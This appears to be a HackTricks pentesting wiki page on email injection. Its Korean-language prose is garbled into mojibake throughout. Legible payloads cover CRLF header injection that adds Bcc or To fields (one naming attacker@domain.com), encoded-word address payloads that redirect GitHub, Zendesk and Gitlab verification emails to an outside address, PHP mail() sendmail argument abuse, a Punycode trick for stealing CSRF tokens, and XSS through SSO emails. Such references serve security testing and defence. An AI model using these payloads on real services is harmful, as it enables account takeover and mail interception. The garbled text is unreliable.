์ด๋ฉ”์ผ ์ธ์ ์…˜

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๋ฐœ์†ก๋œ ์ด๋ฉ”์ผ์— ์ธ์ ์…˜

๋ฐœ์‹ ์ž ์ธ์ž ๋’ค์— Cc ๋ฐ Bcc ์ธ์ ์…˜

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

๋ฉ”์‹œ์ง€๋Š” ์ˆ˜์‹ ์ž ๋ฐ recipient1 ๊ณ„์ •์œผ๋กœ ์ „์†ก๋ฉ๋‹ˆ๋‹ค.

Inject argument

From:sender@domain.com%0ATo:attacker@domain.com

๋ฉ”์‹œ์ง€๋Š” ์›๋ž˜ ์ˆ˜์‹ ์ž์™€ ๊ณต๊ฒฉ์ž ๊ณ„์ •์œผ๋กœ ์ „์†ก๋ฉ๋‹ˆ๋‹ค.

Inject Subject argument

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

๊ฐ€์งœ ์ œ๋ชฉ์€ ์›๋ž˜ ์ œ๋ชฉ์— ์ถ”๊ฐ€๋˜๋ฉฐ, ๊ฒฝ์šฐ์— ๋”ฐ๋ผ ์ด๋ฅผ ๋Œ€์ฒดํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ๋ฉ”์ผ ์„œ๋น„์Šค์˜ ๋™์ž‘์— ๋”ฐ๋ผ ๋‹ค๋ฆ…๋‹ˆ๋‹ค.

๋ฉ”์‹œ์ง€ ๋ณธ๋ฌธ ๋ณ€๊ฒฝ

๋‘ ์ค„ ํ”ผ๋“œ๋ฅผ ์‚ฝ์ž…ํ•œ ๋‹ค์Œ, ๋ฉ”์‹œ์ง€ ๋ณธ๋ฌธ์„ ๋ณ€๊ฒฝํ•˜๊ธฐ ์œ„ํ•ด ๋ฉ”์‹œ์ง€๋ฅผ ์ž‘์„ฑํ•ฉ๋‹ˆ๋‹ค.

From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

PHP mail() ํ•จ์ˆ˜ ์•…์šฉ

# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}

5๋ฒˆ์งธ ๋งค๊ฐœ๋ณ€์ˆ˜ ($additional_parameters)

์ด ์„น์…˜์€ ๊ณต๊ฒฉ์ž๊ฐ€ ์ด ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์ œ์–ดํ•œ๋‹ค๊ณ  ๊ฐ€์ •ํ•  ๋•Œ ์ด๋ฅผ ์•…์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์— ๊ธฐ๋ฐ˜ํ•ฉ๋‹ˆ๋‹ค.

์ด ๋งค๊ฐœ๋ณ€์ˆ˜๋Š” PHP๊ฐ€ ๋ฐ”์ด๋„ˆ๋ฆฌ sendmail์„ ํ˜ธ์ถœํ•˜๋Š” ๋ช…๋ น์ค„์— ์ถ”๊ฐ€๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ escapeshellcmd($additional_parameters) ํ•จ์ˆ˜๋กœ ์„ธ์ฒ™๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค.

์ด ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๋Š” sendmail์— ๋Œ€ํ•œ ์ถ”๊ฐ€ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์ฃผ์ž…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

/usr/sbin/sendmail ๊ตฌํ˜„์˜ ์ฐจ์ด์ 

sendmail ์ธํ„ฐํŽ˜์ด์Šค๋Š” ์‹œ์Šคํ…œ์— ์„ค์น˜๋œ MTA ์ด๋ฉ”์ผ ์†Œํ”„ํŠธ์›จ์–ด(Sendmail, Postfix, Exim ๋“ฑ)์— ์˜ํ•ด ์ œ๊ณต๋ฉ๋‹ˆ๋‹ค. ๊ธฐ๋ณธ ๊ธฐ๋Šฅ(-t -i -f ๋งค๊ฐœ๋ณ€์ˆ˜ ๋“ฑ)์€ ํ˜ธํ™˜์„ฑ ์ด์œ ๋กœ ๊ฐ™์ง€๋งŒ, ์„ค์น˜๋œ MTA์— ๋”ฐ๋ผ ๋‹ค๋ฅธ ๊ธฐ๋Šฅ๊ณผ ๋งค๊ฐœ๋ณ€์ˆ˜๋Š” ํฌ๊ฒŒ ๋‹ค๋ฆ…๋‹ˆ๋‹ค.

๋‹ค์Œ์€ sendmail ๋ช…๋ น/์ธํ„ฐํŽ˜์ด์Šค์˜ ๋‹ค์–‘ํ•œ ๋งค๋‰ด์–ผ ํŽ˜์ด์ง€์˜ ๋ช‡ ๊ฐ€์ง€ ์˜ˆ์ž…๋‹ˆ๋‹ค:

  • Sendmail MTA: http://www.sendmail.org/~ca/email/man/sendmail.html
  • Postfix MTA: http://www.postfix.org/mailq.1.html
  • Exim MTA: https://linux.die.net/man/8/eximReferences

sendmail ๋ฐ”์ด๋„ˆ๋ฆฌ์˜ ์ถœ์ฒ˜์— ๋”ฐ๋ผ ์ด๋ฅผ ์•…์šฉํ•˜๊ณ  ํŒŒ์ผ์„ ์œ ์ถœํ•˜๊ฑฐ๋‚˜ ์ž„์˜์˜ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๋Š” ๋‹ค์–‘ํ•œ ์˜ต์…˜์ด ๋ฐœ๊ฒฌ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html์—์„œ ํ™•์ธํ•˜์„ธ์š”.

์ด๋ฉ”์ผ ์ด๋ฆ„์— ์ฃผ์ž…

Caution

์ž„์˜์˜ ๋„๋ฉ”์ธ ์ด๋ฆ„(์˜ˆ: Github, Gitlab, CloudFlare Zero trustโ€ฆ)์œผ๋กœ ์„œ๋น„์Šค์— ๊ณ„์ •์„ ์ƒ์„ฑํ•˜๊ณ , ํ™•์ธ ์ด๋ฉ”์ผ์„ ์ˆ˜์‹ ํ•˜์—ฌ ์ด๋ฅผ ํ™•์ธํ•˜๋ฉด ํ”ผํ•ด ํšŒ์‚ฌ์˜ ๋ฏผ๊ฐํ•œ ์œ„์น˜์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด๋ฉ”์ผ์˜ ๋ฌด์‹œ๋œ ๋ถ€๋ถ„

๊ธฐํ˜ธ: +, - ๋ฐ **{}**๋Š” ๋“œ๋ฌผ๊ฒŒ ํƒœ๊ทธ ์ง€์ •์— ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์œผ๋ฉฐ ๋Œ€๋ถ€๋ถ„์˜ ์ด๋ฉ”์ผ ์„œ๋ฒ„์—์„œ ๋ฌด์‹œ๋ฉ๋‹ˆ๋‹ค.

  • ์˜ˆ: john.doe+intigriti@example.com โ†’ john.doe@example.com

๊ด„ํ˜ธ () ์‚ฌ์ด์˜ ์ฃผ์„์€ ์‹œ์ž‘ ๋˜๋Š” ๋์— ์žˆ์„ ๊ฒฝ์šฐ์—๋„ ๋ฌด์‹œ๋ฉ๋‹ˆ๋‹ค.

  • ์˜ˆ: john.doe(intigriti)@example.com โ†’ john.doe@example.com

ํ™”์ดํŠธ๋ฆฌ์ŠคํŠธ ์šฐํšŒ

https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

์ธ์šฉ

https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

IP

๋Œ€๊ด„ํ˜ธ ์•ˆ์— IP๋ฅผ ๋„๋ฉ”์ธ ์ด๋ฆ„์œผ๋กœ ์‚ฌ์šฉํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค:

  • john.doe@[127.0.0.1]
  • john.doe@[IPv6:2001:db8::1]

์ด๋ฉ”์ผ ์ธ์ฝ”๋”ฉ

์ด ์—ฐ๊ตฌ์—์„œ ์„ค๋ช…ํ•œ ๋ฐ”์™€ ๊ฐ™์ด, ์ด๋ฉ”์ผ ์ด๋ฆ„์€ ์ธ์ฝ”๋”ฉ๋œ ๋ฌธ์ž๋ฅผ ํฌํ•จํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค:

  • PHP 256 ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ: PHP chr ํ•จ์ˆ˜๋Š” ๋ฌธ์ž๊ฐ€ ์–‘์ˆ˜๊ฐ€ ๋  ๋•Œ๊นŒ์ง€ 256์„ ๊ณ„์† ์ถ”๊ฐ€ํ•œ ํ›„ %256 ์—ฐ์‚ฐ์„ ์ˆ˜ํ–‰ํ•ฉ๋‹ˆ๋‹ค.
  • String.fromCodePoint(0x10000 + 0x40) // ๐€ โ†’ @

Tip

์ด ํŠธ๋ฆญ์˜ ๋ชฉํ‘œ๋Š” RCPT TO:<"collab@psres.net>collab"@example.com>์™€ ๊ฐ™์€ ์ฃผ์ž…์œผ๋กœ ๋๋‚˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.
์ด๋Š” ํ™•์ธ ์ด๋ฉ”์ผ์„ ์˜ˆ์ƒ๋œ ์ด๋ฉ”์ผ ์ฃผ์†Œ์™€ ๋‹ค๋ฅธ ์ด๋ฉ”์ผ ์ฃผ์†Œ๋กœ ๋ณด๋‚ด๊ฒŒ ํ•˜์—ฌ ์ด๋ฉ”์ผ ์ด๋ฆ„ ์•ˆ์— ๋‹ค๋ฅธ ์ด๋ฉ”์ผ ์ฃผ์†Œ๋ฅผ ์‚ฝ์ž…ํ•˜๊ณ  ์ด๋ฉ”์ผ์„ ๋ณด๋‚ผ ๋•Œ ๊ตฌ๋ฌธ์„ ๊นจ๋œจ๋ฆฌ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

๋‹ค์–‘ํ•œ ์ธ์ฝ”๋”ฉ:

# Format
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com

# =? -> Start of encode
# utf-8 -> encoding used
# ? -> separator
# q -> type of encoding
# ? -> separator
# =41=42=43 -> Hex encoded data
# ?= end of encoding

# Other encodings, same example:
#ย iso-8859-1
=?iso-8859-1?q?=61=62=63?=hi@example.com
# utf-8
=?utf-8?q?=61=62=63?=hi@example.com
# utf-7
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
# q encoding + utf-7
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
# base64
=?utf-8?b?QUJD?=hi@example.com
# bas64 + utf-7
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
#punycode
x@xn--svg/-9x6 โ†’ x@<svg/

Payloads:

  • Github: =?x?q?collab=40psres.net=3e=00?=foo@example.com
  • ์ธ์ฝ”๋”ฉ๋œ @๋Š” =40, ์ธ์ฝ”๋”ฉ๋œ >๋Š” =3e, ๊ทธ๋ฆฌ๊ณ  null์€ =00์ž…๋‹ˆ๋‹ค.
  • ํ™•์ธ ์ด๋ฉ”์ผ์ด collab@psres.net์œผ๋กœ ์ „์†ก๋ฉ๋‹ˆ๋‹ค.
  • Zendesk: "=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com
  • ์ด์ „๊ณผ ๊ฐ™์€ ํŠธ๋ฆญ์ด์ง€๋งŒ, ์‹œ์ž‘ ๋ถ€๋ถ„์— ์ผ๋ฐ˜ ๋”ฐ์˜ดํ‘œ๋ฅผ ์ถ”๊ฐ€ํ•˜๊ณ  ์ธ์ฝ”๋”ฉ๋œ ๋”ฐ์˜ดํ‘œ =22๋ฅผ ์ธ์ฝ”๋”ฉ๋œ @ ์•ž์— ์ถ”๊ฐ€ํ•œ ํ›„, ๋‹ค์Œ ์ด๋ฉ”์ผ ์•ž์— ๋”ฐ์˜ดํ‘œ๋ฅผ ์‹œ์ž‘ํ•˜๊ณ  ๋‹ซ์•„ Zendesk์—์„œ ๋‚ด๋ถ€์ ์œผ๋กœ ์‚ฌ์šฉ๋˜๋Š” ๊ตฌ๋ฌธ์„ ์ˆ˜์ •ํ•ฉ๋‹ˆ๋‹ค.
  • ํ™•์ธ ์ด๋ฉ”์ผ์ด collab@psres.net์œผ๋กœ ์ „์†ก๋ฉ๋‹ˆ๋‹ค.
  • Gitlab: =?x?q?collab=40psres.net_?=foo@example.com
  • ์ฃผ์†Œ๋ฅผ ๊ตฌ๋ถ„ํ•˜๊ธฐ ์œ„ํ•ด ์–ธ๋”์Šค์ฝ”์–ด๋ฅผ ๊ณต๋ฐฑ์œผ๋กœ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค.
  • ํ™•์ธ ์ด๋ฉ”์ผ์ด collab@psres.net์œผ๋กœ ์ „์†ก๋ฉ๋‹ˆ๋‹ค.
  • Punycode: Punycode๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ Joomla์— <style ํƒœ๊ทธ๋ฅผ ์ฃผ์ž…ํ•˜๊ณ  ์ด๋ฅผ ์•…์šฉํ•˜์—ฌ CSS ์œ ์ถœ์„ ํ†ตํ•ด CSRF ํ† ํฐ์„ ํ›”์น  ์ˆ˜ ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค.

Tooling

  • ์ด๋Ÿฌํ•œ ์กฐํ•ฉ์„ ํผ์ง•ํ•˜์—ฌ ์ด๋ฉ”์ผ ํ˜•์‹์„ ๊ณต๊ฒฉํ•˜๋ ค๋Š” Burp Suite Turbo Intruder ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ์ด๋ฏธ ์ž ์žฌ์ ์œผ๋กœ ์ž‘๋™ํ•˜๋Š” ์กฐํ•ฉ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.
  • Hackvertor๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ด๋ฉ”์ผ ๋ถ„ํ•  ๊ณต๊ฒฉ์„ ์ƒ์„ฑํ•˜๋Š” ๊ฒƒ๋„ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

Other vulns

https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

Third party SSO

XSS

github ๋˜๋Š” salesforce์™€ ๊ฐ™์€ ์ผ๋ถ€ ์„œ๋น„์Šค๋Š” XSS ํŽ˜์ด๋กœ๋“œ๊ฐ€ ํฌํ•จ๋œ ์ด๋ฉ”์ผ ์ฃผ์†Œ๋ฅผ ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ œ๊ณต์ž๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค๋ฅธ ์„œ๋น„์Šค์— ๋กœ๊ทธ์ธํ•  ์ˆ˜ ์žˆ๊ณ , ์ด ์„œ๋น„์Šค๊ฐ€ ์ด๋ฉ”์ผ์„ ์˜ฌ๋ฐ”๋ฅด๊ฒŒ ์ •๋ฆฌํ•˜์ง€ ์•Š๋Š”๋‹ค๋ฉด, XSS๋ฅผ ์œ ๋ฐœํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Account-Takeover

SSO ์„œ๋น„์Šค๊ฐ€ ์ฃผ์–ด์ง„ ์ด๋ฉ”์ผ ์ฃผ์†Œ๋ฅผ ํ™•์ธํ•˜์ง€ ์•Š๊ณ  ๊ณ„์ •์„ ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜๊ณ  (์˜ˆ: salesforce), ๊ทธ ๊ณ„์ •์„ ์‚ฌ์šฉํ•˜์—ฌ salesforce๋ฅผ ์‹ ๋ขฐํ•˜๋Š” ๋‹ค๋ฅธ ์„œ๋น„์Šค์— ๋กœ๊ทธ์ธํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด, ๋ชจ๋“  ๊ณ„์ •์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
์ฃผ์–ด์ง„ ์ด๋ฉ”์ผ์ด ํ™•์ธ๋˜์—ˆ๋Š”์ง€ ์—ฌ๋ถ€๋ฅผ salesforce๊ฐ€ ํ‘œ์‹œํ•˜์ง€๋งŒ, ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์€ ์ด ์ •๋ณด๋ฅผ ๊ณ ๋ คํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

Reply-To

_From: company.com_์„ ์‚ฌ์šฉํ•˜์—ฌ ์ด๋ฉ”์ผ์„ ๋ณด๋‚ผ ์ˆ˜ ์žˆ์œผ๋ฉฐ, _Replay-To: attacker.com_์„ ์„ค์ •ํ•˜๋ฉด, ๋‚ด๋ถ€ ์ฃผ์†Œ์—์„œ ์ด๋ฉ”์ผ์ด ๋ฐœ์†ก๋˜์—ˆ๊ธฐ ๋•Œ๋ฌธ์— ์ž๋™ ํšŒ์‹ ์ด ์ „์†ก๋  ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๊ฐ€ ๊ทธ ์‘๋‹ต์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Hard Bounce Rate

AWS์™€ ๊ฐ™์€ ํŠน์ • ์„œ๋น„์Šค๋Š” Hard Bounce Rate๋กœ ์•Œ๋ ค์ง„ ์ž„๊ณ„๊ฐ’์„ ๊ตฌํ˜„ํ•˜๋ฉฐ, ์ผ๋ฐ˜์ ์œผ๋กœ 10%๋กœ ์„ค์ •๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์ด๋ฉ”์ผ ๋ฐฐ๋‹ฌ ์„œ๋น„์Šค์— ํŠนํžˆ ์ค‘์š”ํ•œ ์ง€ํ‘œ์ž…๋‹ˆ๋‹ค. ์ด ๋น„์œจ์„ ์ดˆ๊ณผํ•˜๋ฉด AWS์˜ ์ด๋ฉ”์ผ ์„œ๋น„์Šค์™€ ๊ฐ™์€ ์„œ๋น„์Šค๊ฐ€ ์ค‘๋‹จ๋˜๊ฑฐ๋‚˜ ์ฐจ๋‹จ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

ํ•˜๋“œ ๋ฐ”์šด์Šค๋Š” ์ˆ˜์‹ ์ž์˜ ์ฃผ์†Œ๊ฐ€ ์œ ํšจํ•˜์ง€ ์•Š๊ฑฐ๋‚˜ ์กด์žฌํ•˜์ง€ ์•Š์•„ ๋ฐœ์‹ ์ž์—๊ฒŒ ๋ฐ˜ํ™˜๋œ ์ด๋ฉ”์ผ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์กด์žฌํ•˜์ง€ ์•Š๋Š” ์ฃผ์†Œ๋กœ ์ด๋ฉ”์ผ์ด ์ „์†ก๋˜๊ฑฐ๋‚˜, ์‹ค์ œ๊ฐ€ ์•„๋‹Œ ๋„๋ฉ”์ธ์œผ๋กœ ์ „์†ก๋˜๊ฑฐ๋‚˜, ์ˆ˜์‹ ์ž ์„œ๋ฒ„๊ฐ€ ์ด๋ฉ”์ผ ์ˆ˜์‹ ์„ ๊ฑฐ๋ถ€ํ•˜๋Š” ๋“ฑ์˜ ๋‹ค์–‘ํ•œ ์ด์œ ๋กœ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

AWS์˜ ๋งฅ๋ฝ์—์„œ 1000๊ฐœ์˜ ์ด๋ฉ”์ผ์„ ๋ณด๋‚ด๊ณ  ๊ทธ ์ค‘ 100๊ฐœ๊ฐ€ ํ•˜๋“œ ๋ฐ”์šด์Šค๊ฐ€ ๋ฐœ์ƒํ•˜๋ฉด (์œ ํšจํ•˜์ง€ ์•Š์€ ์ฃผ์†Œ๋‚˜ ๋„๋ฉ”์ธ๊ณผ ๊ฐ™์€ ์ด์œ ๋กœ), ์ด๋Š” 10%์˜ ํ•˜๋“œ ๋ฐ”์šด์Šค ๋น„์œจ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ์ด ๋น„์œจ์— ๋„๋‹ฌํ•˜๊ฑฐ๋‚˜ ์ดˆ๊ณผํ•˜๋ฉด AWS SES (Simple Email Service)๊ฐ€ ์ด๋ฉ”์ผ ๋ฐœ์†ก ๊ธฐ๋Šฅ์„ ์ฐจ๋‹จํ•˜๊ฑฐ๋‚˜ ์ค‘๋‹จํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ค‘๋‹จ ์—†๋Š” ์ด๋ฉ”์ผ ์„œ๋น„์Šค๋ฅผ ๋ณด์žฅํ•˜๊ณ  ๋ฐœ์‹ ์ž ํ‰ํŒ์„ ์œ ์ง€ํ•˜๊ธฐ ์œ„ํ•ด ๋‚ฎ์€ ํ•˜๋“œ ๋ฐ”์šด์Šค ๋น„์œจ์„ ์œ ์ง€ํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. ๋ฉ”์ผ๋ง ๋ฆฌ์ŠคํŠธ์˜ ์ด๋ฉ”์ผ ์ฃผ์†Œ ํ’ˆ์งˆ์„ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜๊ณ  ๊ด€๋ฆฌํ•˜๋Š” ๊ฒƒ์ด ์ด๋ฅผ ๋‹ฌ์„ฑํ•˜๋Š” ๋ฐ ํฌ๊ฒŒ ๋„์›€์ด ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ž์„ธํ•œ ์ •๋ณด๋Š” AWS์˜ ๊ณต์‹ ๋ฌธ์„œ์—์„œ ๋ฐ”์šด์Šค ๋ฐ ๋ถˆ๋งŒ ์ฒ˜๋ฆฌ์— ๋Œ€ํ•œ ๋‚ด์šฉ์„ ์ฐธ์กฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค AWS SES Bounce Handling.

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ